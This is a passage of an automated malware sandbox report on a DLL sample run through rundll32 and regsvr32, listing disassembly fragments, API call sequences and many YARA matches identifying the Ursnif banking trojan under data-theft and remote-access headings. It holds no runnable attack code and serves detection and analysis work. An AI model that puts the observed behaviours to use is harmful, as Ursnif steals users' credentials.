                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_008A0469 mov eax, dword ptr fs:[00000030h]24_2_008A0469
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_008A009C mov eax, dword ptr fs:[00000030h]24_2_008A009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_008A03F0 mov eax, dword ptr fs:[00000030h]24_2_008A03F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_008A0397 mov eax, dword ptr fs:[00000030h]24_2_008A0397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 29_2_009203F0 mov eax, dword ptr fs:[00000030h]29_2_009203F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 29_2_00920397 mov eax, dword ptr fs:[00000030h]29_2_00920397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 29_2_0092009C mov eax, dword ptr fs:[00000030h]29_2_0092009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 29_2_00920469 mov eax, dword ptr fs:[00000030h]29_2_00920469
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 30_2_029E009C mov eax, dword ptr fs:[00000030h]30_2_029E009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 30_2_029E0397 mov eax, dword ptr fs:[00000030h]30_2_029E0397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 30_2_029E03F0 mov eax, dword ptr fs:[00000030h]30_2_029E03F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 30_2_029E0469 mov eax, dword ptr fs:[00000030h]30_2_029E0469
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 33_2_02DE009C mov eax, dword ptr fs:[00000030h]33_2_02DE009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 33_2_02DE0469 mov eax, dword ptr fs:[00000030h]33_2_02DE0469
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 33_2_02DE03F0 mov eax, dword ptr fs:[00000030h]33_2_02DE03F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 33_2_02DE0397 mov eax, dword ptr fs:[00000030h]33_2_02DE0397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 36_2_029D009C mov eax, dword ptr fs:[00000030h]36_2_029D009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 36_2_029D0397 mov eax, dword ptr fs:[00000030h]36_2_029D0397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 36_2_029D03F0 mov eax, dword ptr fs:[00000030h]36_2_029D03F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 36_2_029D0469 mov eax, dword ptr fs:[00000030h]36_2_029D0469
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 38_2_00600469 mov eax, dword ptr fs:[00000030h]38_2_00600469
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 38_2_006003F0 mov eax, dword ptr fs:[00000030h]38_2_006003F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 38_2_00600397 mov eax, dword ptr fs:[00000030h]38_2_00600397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 38_2_0060009C mov eax, dword ptr fs:[00000030h]38_2_0060009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 40_2_02AA0469 mov eax, dword ptr fs:[00000030h]40_2_02AA0469
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 40_2_02AA009C mov eax, dword ptr fs:[00000030h]40_2_02AA009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 40_2_02AA03F0 mov eax, dword ptr fs:[00000030h]40_2_02AA03F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 40_2_02AA0397 mov eax, dword ptr fs:[00000030h]40_2_02AA0397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 43_2_029E009C mov eax, dword ptr fs:[00000030h]43_2_029E009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 43_2_029E0469 mov eax, dword ptr fs:[00000030h]43_2_029E0469
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 43_2_029E0397 mov eax, dword ptr fs:[00000030h]43_2_029E0397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 43_2_029E03F0 mov eax, dword ptr fs:[00000030h]43_2_029E03F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 44_2_029B009C mov eax, dword ptr fs:[00000030h]44_2_029B009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 44_2_029B0469 mov eax, dword ptr fs:[00000030h]44_2_029B0469
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 44_2_029B0397 mov eax, dword ptr fs:[00000030h]44_2_029B0397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 44_2_029B03F0 mov eax, dword ptr fs:[00000030h]44_2_029B03F0
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1Jump to behavior
                      Source: loaddll32.exe, 00000000.00000002.522901850.0000000001900000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.526447012.0000000002D40000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.527266541.00000000033E0000.00000002.00020000.sdmp, rundll32.exe, 00000013.00000000.343606007.0000000003920000.00000002.00020000.sdmp, rundll32.exe, 00000019.00000000.369950611.0000000002AE0000.00000002.00020000.sdmp, rundll32.exe, 00000021.00000002.526535175.00000000036E0000.00000002.00020000.sdmpBinary or memory string: uProgram Manager
                      Source: loaddll32.exe, 00000000.00000002.522901850.0000000001900000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.526447012.0000000002D40000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.527266541.00000000033E0000.00000002.00020000.sdmp, rundll32.exe, 00000013.00000000.343606007.0000000003920000.00000002.00020000.sdmp, rundll32.exe, 00000019.00000000.369950611.0000000002AE0000.00000002.00020000.sdmp, rundll32.exe, 00000021.00000002.526535175.00000000036E0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.522901850.0000000001900000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.526447012.0000000002D40000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.527266541.00000000033E0000.00000002.00020000.sdmp, rundll32.exe, 00000013.00000000.343606007.0000000003920000.00000002.00020000.sdmp, rundll32.exe, 00000019.00000000.369950611.0000000002AE0000.00000002.00020000.sdmp, rundll32.exe, 00000021.00000002.526535175.00000000036E0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.522901850.0000000001900000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.526447012.0000000002D40000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.527266541.00000000033E0000.00000002.00020000.sdmp, rundll32.exe, 00000013.00000000.343606007.0000000003920000.00000002.00020000.sdmp, rundll32.exe, 00000019.00000000.369950611.0000000002AE0000.00000002.00020000.sdmp, rundll32.exe, 00000021.00000002.526535175.00000000036E0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F9269C cpuid 0_2_02F9269C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0040102F GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_0040102F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00401850 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_00401850
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F9269C RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,0_2_02F9269C

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 0000002C.00000003.488597994.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322676857.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.474137548.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322202508.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.473987515.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322499280.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488543169.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.504757746.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.417091528.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.530490300.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488696812.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.416892582.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488440717.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.416449935.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.473902712.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.505290500.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.474356584.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.417147272.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.416620379.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.505377175.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488723167.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.504698368.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.417041948.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.474088169.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.528892428.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.504300183.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322381939.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322406561.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.504841805.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322337741.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.474318739.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322575665.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.504617318.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.504419460.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488754897.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.474399932.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488667528.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488635694.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.416772424.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.530985686.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322291731.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.474430335.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.416968580.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 5004, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5828, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1404, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4868, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7100, type: MEMORYSTR
                      Source: Yara matchFile source: 25.2.rundll32.exe.510000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.510000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.510000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.47e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.rundll32.exe.7b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.2ba0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.32a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.26d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.rundll32.exe.49a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.26d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 38.2.rundll32.exe.610000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.rundll32.exe.29f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 44.2.rundll32.exe.29f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.3ef0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rundll32.exe.920000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.3ef0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.rundll32.exe.29f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.2cf0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.3610000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.1420000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.7f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rundll32.exe.29f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.33b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.32a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.3ef0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.rundll32.exe.2df0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.27c0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.32a0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.rundll32.exe.2a00000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.400000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.3ef0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.rundll32.exe.2ad0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.310878760.00000000033B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.420794237.0000000002A00000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.345060840.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.518028253.0000000001420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.294274391.0000000003610000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.522287201.0000000002CF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.520736013.0000000002DF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.340961934.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000002.441408261.0000000002AD0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.426506350.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000002.502483591.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.366167651.0000000000510000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.346648661.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.512763307.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.433128810.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.329480680.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.513121198.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000002.464297747.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.380004706.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.523877392.00000000027C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.305530234.00000000047E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.372926133.00000000049A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.438165350.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.342868805.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.320841608.00000000007F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.459018631.0000000000510000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.389489795.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.364022083.0000000003EF0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.347833864.0000000000920000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.371029885.0000000003EF0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.477089969.0000000000610000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.361319898.0000000000510000.00000040.00000001.sdmp, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 0000002C.00000003.488597994.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322676857.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.474137548.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322202508.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.473987515.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322499280.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488543169.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.504757746.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.417091528.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.530490300.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488696812.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.416892582.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488440717.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.416449935.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.473902712.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.505290500.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.474356584.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.417147272.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.416620379.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.505377175.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488723167.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.504698368.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.417041948.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.474088169.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.528892428.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.504300183.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322381939.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322406561.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.504841805.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322337741.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.474318739.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322575665.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.504617318.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.504419460.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488754897.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.474399932.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488667528.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488635694.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.416772424.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.530985686.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322291731.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.474430335.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.416968580.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 5004, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5828, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1404, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4868, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7100, type: MEMORYSTR
                      Source: Yara matchFile source: 25.2.rundll32.exe.510000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.510000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.510000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.47e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.rundll32.exe.7b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.2ba0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.32a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.26d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.rundll32.exe.49a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.26d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 38.2.rundll32.exe.610000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.rundll32.exe.29f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 44.2.rundll32.exe.29f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.3ef0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rundll32.exe.920000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.3ef0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.rundll32.exe.29f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.2cf0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.3610000.0.raw.unpack, type: UNPACKEDPE
